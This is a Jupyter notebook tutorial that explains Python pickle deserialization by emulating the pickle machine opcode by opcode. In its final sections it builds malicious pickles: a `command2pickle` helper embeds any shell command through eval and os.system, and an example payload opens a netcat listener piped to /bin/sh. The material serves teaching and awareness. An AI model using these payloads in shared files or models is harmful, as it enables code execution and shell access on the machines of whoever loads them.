# Dangerous Pickles

Based on: https://intoli.com/blog/dangerous-pickles/

See also: https://huggingface.co/docs/hub/security-pickle

In [2]:
import pickle

# Any picklable Python object will do as a starting point.
original = dict(a=0, b=[1, 2, 3])

# Serialize it to a bytes object ...
pickled = pickle.dumps(original)

# ... and deserialize those bytes into an equal, but distinct, object.
identical = pickle.loads(pickled)


Example ```Bomb``` class to be pickled

In [4]:
class Bomb:
    """Toy class whose unpickling has a visible side effect."""

    def __init__(self, name: str) -> None:
        self.name = name

    def __getstate__(self) -> str:
        """Return the state to pickle: only the name, not the instance ``__dict__``."""
        return self.name

    def __setstate__(self, state: str) -> None:
        """Restore the name from ``state`` and print a message as a side effect."""
        self.name = state
        print(f'Bang! From, {self.name}.')

# The instance that the following cells pickle and take apart.
bomb = Bomb('Evan')


The `__setstate__()` and `__getstate__()` methods are used by the pickle module to serialize and deserialize classes. You often don’t need to define these yourself because the default implementations will just serialize the instance’s `__dict__`. As you can see, I’ve defined them explicitly here so that I can sneak in a little surprise for when the `Bomb` object is deserialized.

In [5]:
import pickle

# Protocol 0 is requested so the pickle is the text-based opcode stream that
# the following cells display and disassemble.
pickled_bomb = pickle.dumps(bomb, protocol=0)
# Unpickling calls Bomb.__setstate__, which prints the "Bang!" message.
unpickled_bomb = pickle.loads(pickled_bomb)


Bang! From, Evan.


In [6]:
# Display the raw protocol-0 bytes produced for `bomb`.
pickled_bomb

b'ccopy_reg\n_reconstructor\np0\n(c__main__\nBomb\np1\nc__builtin__\nobject\np2\nNtp3\nRp4\nVEvan\np5\nb.'

In [7]:
import pickletools

# Print the pickle one opcode per line: byte offset, opcode character,
# opcode name and argument.
pickletools.dis(pickled_bomb)


    0: c    GLOBAL     'copy_reg _reconstructor'
   25: p    PUT        0
   28: (    MARK
   29: c        GLOBAL     '__main__ Bomb'
   44: p        PUT        1
   47: c        GLOBAL     '__builtin__ object'
   67: p        PUT        2
   70: N        NONE
   71: t        TUPLE      (MARK at 28)
   72: p    PUT        3
   75: R    REDUCE
   76: p    PUT        4
   79: V    UNICODE    'Evan'
   85: p    PUT        5
   88: b    BUILD
   89: .    STOP
highest protocol among opcodes = 0


In [8]:
# Rewrite the pickle in a more compact form; in the listing printed below the
# PUT opcodes of the previous disassembly are gone.
pickled_bomb = pickletools.optimize(pickled_bomb)
pickletools.dis(pickled_bomb)


    0: c    GLOBAL     'copy_reg _reconstructor'
   25: (    MARK
   26: c        GLOBAL     '__main__ Bomb'
   41: c        GLOBAL     '__builtin__ object'
   61: N        NONE
   62: t        TUPLE      (MARK at 25)
   63: R    REDUCE
   64: V    UNICODE    'Evan'
   70: b    BUILD
   71: .    STOP
highest protocol among opcodes = 0


## Step 0: emulate memory / stack for pickle machine

In [9]:
# Long-term storage of the pickle machine (PM). Kept for completeness: none of
# the emulation steps below read or write it.
memo = dict()
# Working stack of the PM; most opcodes push to it or pop from it.
stack = list()

## Step 1: put global object on stack

In [10]:
# Push a global object (module.attr) on the stack.
#  0: c    GLOBAL     'copy_reg _reconstructor'
# The opcode names the module `copy_reg`; the function is imported here from
# `copyreg` (presumably the Python 3 name of the same module -- see the pickle
# documentation on `fix_imports`).
from copyreg import _reconstructor
stack.append(_reconstructor)

## Step 2: put special ```markobject``` on stack (rep'd with 'MARK')

In [11]:
# Push markobject onto the stack.
# 25: (    MARK
# The string 'MARK' stands in for the pickle machine's mark object; the TUPLE
# step later searches the stack for it.
stack.append('MARK')


## Step 3: putting global object on stack - our ```Bomb```

In [12]:
# Push a global object (module.attr) on the stack.
# 26: c        GLOBAL     '__main__ Bomb'
# `Bomb` is the class defined earlier in this notebook.
stack.append(Bomb)

## Step 4: setting up global ```object``` from ```__builtin__```

In [13]:
# Push a global object (module.attr) on the stack.
# 41: c        GLOBAL     '__builtin__ object'
# The built-in `object` type; it ends up as the `base` argument of
# `_reconstructor`.
stack.append(object)

## Step 5: putting ```NONE``` on stack (it becomes the ```state``` argument of ```_reconstructor```)

In [14]:
# Push None on the stack.
# 61: N        NONE
# This None ends up as the `state` argument of `_reconstructor`.
stack.append(None)

## Step 6: replace everything since ```markobject``` with a tuple

In [15]:
# Build a tuple out of the topmost stack slice, after markobject.
# 62: t        TUPLE      (MARK at 25)
# Position of the most recently pushed 'MARK' (the highest matching index).
last_mark_index = max(i for i, item in enumerate(stack) if item == 'MARK')
# Everything above the mark becomes the tuple ...
mark_tuple = tuple(stack[last_mark_index + 1:])
# ... which replaces the mark together with the items that followed it.
stack = [*stack[:last_mark_index], mark_tuple]

In [None]:
# the stack before the TUPLE operation:
[<function copyreg._reconstructor>, 'MARK', __main__.Bomb, object, None]
# the stack after the TUPLE operation:
[<function copyreg._reconstructor>, (__main__.Bomb, object, None)]

## Step 7: ```REDUCE``` pops last two things off stack, calls one with the other, and pushes the result

In [16]:
# Push an object built from a callable and an argument tuple.
# 63: R    REDUCE
# The argument tuple sits on top of the stack with the callable just beneath
# it, so the tuple is popped first.
args = stack.pop()
# Named `func` rather than `callable` so the built-in callable() is not
# shadowed for the rest of the notebook session.
func = stack.pop()
stack.append(func(*args))

## Step 8: plop a Unicode string on the stack

In [17]:
# Push a Python Unicode string object.
# 64: V    UNICODE    'Evan'
# A plain str literal is already Unicode in Python 3, so no `u` prefix is used.
stack.append('Evan')

## Step 9: ```BUILD``` takes last thing off stack and passes it to ```__setstate__()```

In [18]:
# Finish building an object, via __setstate__ or dict update.
# 70: b    BUILD
# Only the __setstate__ path is emulated here: the state is popped and handed
# to the object that is left on top of the stack.
arg = stack.pop()
stack[-1].__setstate__(arg)

Bang! From, Evan.


## Step 10: ```STOP``` means the top of stack is final result

In [19]:
# Stop the unpickling machine.
# 71: .    STOP
# Whatever is on top of the stack is taken as the result of unpickling.
unpickled_bomb = stack[-1]

simplified version:

In [9]:
# Step 1, where `_reconstructor` was imported
from copyreg import _reconstructor

# Step 7, where `_reconstructor` was called with the tuple built in step 6
unpickled_bomb = _reconstructor(cls=Bomb, base=object, state=None)
# Step 9, where `__setstate__` was called with the string pushed in step 8
unpickled_bomb.__setstate__('Evan')

Bang! From, Evan.


ULTRASIMPLIFIED version:

In [10]:
# Create a Bomb instance without going through Bomb.__init__ ...
unpickled_bomb = object.__new__(Bomb)
# ... then hand it the pickled state, which prints the message.
unpickled_bomb.__setstate__('Evan')

Bang! From, Evan.


# Building our own

In [None]:
# add a function to the stack to execute arbitrary python
GLOBAL     '__builtin__ eval'
# mark the start of our args tuple
MARK
    # add the Python code that we want to execute to the stack
    UNICODE    'print("Bang! From, Evan.")'
    # wrap that code into a tuple so it can be parsed by REDUCE
    TUPLE
# call `eval()` with our Python code as an argument
REDUCE
# STOP is required to be valid PM code
STOP


Now to convert this into an actual pickle, we need to replace each opcode with its corresponding ASCII code: c for GLOBAL, ( for MARK, V for UNICODE, t for TUPLE, R for REDUCE, and . for STOP

In [None]:
c__builtin__
eval
(Vprint("Bang! From, Evan.")
tR.

In [11]:
# Run me at home!
# I'm safe, I promise!
# The hand-assembled pickle, written out one piece per group of opcodes.
pickled_bomb = (
    b'c__builtin__\neval\n'            # GLOBAL  '__builtin__ eval'
    b'(Vprint("Bang! From, Evan.")\n'  # MARK, then UNICODE with the code to run
    b'tR.'                             # TUPLE, REDUCE, STOP
)
pickle.loads(pickled_bomb)

Bang! From, Evan.


# malicious pickle ideas

In [39]:
def command2pickle(command: str) -> bytes:
    """Build a protocol-0 pickle that runs ``command`` via ``os.system`` when loaded.

    The pickle consists of ``GLOBAL '__builtin__ eval'``, a one-element
    argument tuple holding the expression ``__import__("os").system("<command>")``,
    then ``REDUCE`` and ``STOP``.

    Args:
        command: Shell command to embed. Double quotes, backslashes and line
            breaks are escaped so that the embedded expression stays valid.

    Returns:
        The pickle as bytes. Loading it executes ``command``, so only ever
        load it in an environment you control.
    """
    # Escape the command so it forms a valid double-quoted Python string literal.
    literal = (
        command.replace('\\', '\\\\')
        .replace('"', '\\"')
        .replace('\n', '\\n')
        .replace('\r', '\\r')
    )
    expression = '__import__("os").system("' + literal + '")'
    # The UNICODE opcode reads one newline-terminated line and decodes it as
    # raw-unicode-escape, so every backslash has to be written as \u005c.
    payload = expression.replace('\\', '\\u005c').encode('raw-unicode-escape')
    return b'c__builtin__\neval\n(V' + payload + b'\ntR.'

### opens an ```nc``` listener that pipes input to ```/bin/sh```

Props to the ```ncat``` ```man``` page for this example!

In [9]:
# pickle command builder
# The command recreates /tmp/f as a FIFO and uses it to connect an interactive
# /bin/sh to an `nc` listener on 127.0.0.1 port 1999.
command = (
    'rm -f /tmp/f; mkfifo /tmp/f; '
    'cat /tmp/f | /bin/sh -i 2>&1 | nc -l 127.0.0.1 1999 > /tmp/f'
)
# Reuse the command2pickle helper instead of assembling the opcodes by hand again.
pickled_shell = command2pickle(command)
print(pickled_shell.decode())

c__builtin__
eval
(V__import__("os").system("rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc -l 127.0.0.1 1999 > /tmp/f")
tR.


In [11]:
# works!
# WARNING: loading this pickle runs the shell command embedded in
# `pickled_shell`. The value displayed below is what the embedded
# os.system(...) call returned.
pickle.loads(pickled_shell)

0

If you are brave enough to unpickle this on your own machine (do not use maliciously! do not use for violations of law or policy!), simply run ```nc 127.0.0.1 1999``` and you have a shell on your own machine!